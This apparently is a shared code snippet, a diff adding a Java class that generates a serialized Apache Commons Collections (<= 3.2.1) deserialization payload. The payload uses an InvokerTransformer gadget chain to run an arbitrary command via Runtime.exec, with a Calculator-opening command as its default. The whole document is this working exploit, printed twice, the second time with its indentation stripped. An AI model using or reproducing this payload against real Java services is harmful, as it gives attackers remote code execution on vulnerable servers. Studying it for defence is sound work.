RickGray · November 25, 2015 14:43
diff --git a/CommonsCollectionPOPGadget.java b/CommonsCollectionPOPGadget.java
 package exserial.payloads;

 import java.io.ObjectOutputStream;

 import java.util.Map;
 import java.util.HashMap;

 import java.lang.annotation.Target;
 import java.lang.reflect.Constructor;

 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.map.TransformedMap;
 import org.apache.commons.collections.functors.InvokerTransformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;

 /*
    Gadget chain:
        ObjectInputStream.readObject()
            AnnotationInvocationHandler.readObject()
                AbstractInputCheckedMapDecorator$MapEntry.setValue()
                    TransformedMap.checkSetValue()
                        ConstantTransformer.transform()
                        InvokerTransformer.transform()
                            Method.invoke()
                                Class.getMethod()
                        InvokerTransformer.transform()
                            Method.invoke()
                                Runtime.getRuntime()
                        InvokerTransformer.transform()
                            Method.invoke()
                                Runtime.exec()

    Requires:
        commons-collections <= 3.2.1
 */

 public class Commons1 {

    public static Object getAnnotationInvocationHandler(String command) throws Exception {
        String[] execArgs = command.split(",");
        Transformer[] transforms = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(
                        "getMethod",
                        new Class[] {String.class, Class[].class},
                        new Object[] {"getRuntime", new Class[0]}
                ),
                new InvokerTransformer(
                        "invoke",
                        new Class[] {Object.class, Object[].class},
                        new Object[] {null, new Object[0]}
                ),
                new InvokerTransformer(
                        "exec",
                        new Class[] {String[].class},
                        new Object[] {execArgs}
                )
        };
        Transformer transformerChain = new ChainedTransformer(transforms);
        Map tempMap = new HashMap();
        tempMap.put("value", "does't matter");
        Map exMap = TransformedMap.decorate(tempMap, null, transformerChain);
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        Object instance = ctor.newInstance(Target.class, exMap);

        return instance;
    }

    public static void main(String[] args) throws Exception {
        String command = (args.length != 0) ? args[0] : "/bin/sh,-c,open /Applications/Calculator.app";

        Object obj = getAnnotationInvocationHandler(command);
        ObjectOutputStream out = new ObjectOutputStream(System.out);
        out.writeObject(obj);
    }
 }
	package exserial.payloads;

	import java.io.ObjectOutputStream;

	import java.util.Map;
	import java.util.HashMap;

	import java.lang.annotation.Target;
	import java.lang.reflect.Constructor;

	import org.apache.commons.collections.Transformer;
	import org.apache.commons.collections.map.TransformedMap;
	import org.apache.commons.collections.functors.InvokerTransformer;
	import org.apache.commons.collections.functors.ChainedTransformer;
	import org.apache.commons.collections.functors.ConstantTransformer;

	/*
	Gadget chain:
	ObjectInputStream.readObject()
	AnnotationInvocationHandler.readObject()
	AbstractInputCheckedMapDecorator$MapEntry.setValue()
	TransformedMap.checkSetValue()
	ConstantTransformer.transform()
	InvokerTransformer.transform()
	Method.invoke()
	Class.getMethod()
	InvokerTransformer.transform()
	Method.invoke()
	Runtime.getRuntime()
	InvokerTransformer.transform()
	Method.invoke()
	Runtime.exec()

	Requires:
	commons-collections <= 3.2.1
	*/

	public class Commons1 {

	public static Object getAnnotationInvocationHandler(String command) throws Exception {
	String[] execArgs = command.split(",");
	Transformer[] transforms = new Transformer[] {
	new ConstantTransformer(Runtime.class),
	new InvokerTransformer(
	"getMethod",
	new Class[] {String.class, Class[].class},
	new Object[] {"getRuntime", new Class[0]}
	),
	new InvokerTransformer(
	"invoke",
	new Class[] {Object.class, Object[].class},
	new Object[] {null, new Object[0]}
	),
	new InvokerTransformer(
	"exec",
	new Class[] {String[].class},
	new Object[] {execArgs}
	)
	};
	Transformer transformerChain = new ChainedTransformer(transforms);
	Map tempMap = new HashMap();
	tempMap.put("value", "does't matter");
	Map exMap = TransformedMap.decorate(tempMap, null, transformerChain);
	Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
	Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
	ctor.setAccessible(true);
	Object instance = ctor.newInstance(Target.class, exMap);

	return instance;
	}

	public static void main(String[] args) throws Exception {
	String command = (args.length != 0) ? args[0] : "/bin/sh,-c,open /Applications/Calculator.app";

	Object obj = getAnnotationInvocationHandler(command);
	ObjectOutputStream out = new ObjectOutputStream(System.out);
	out.writeObject(obj);
	}
	}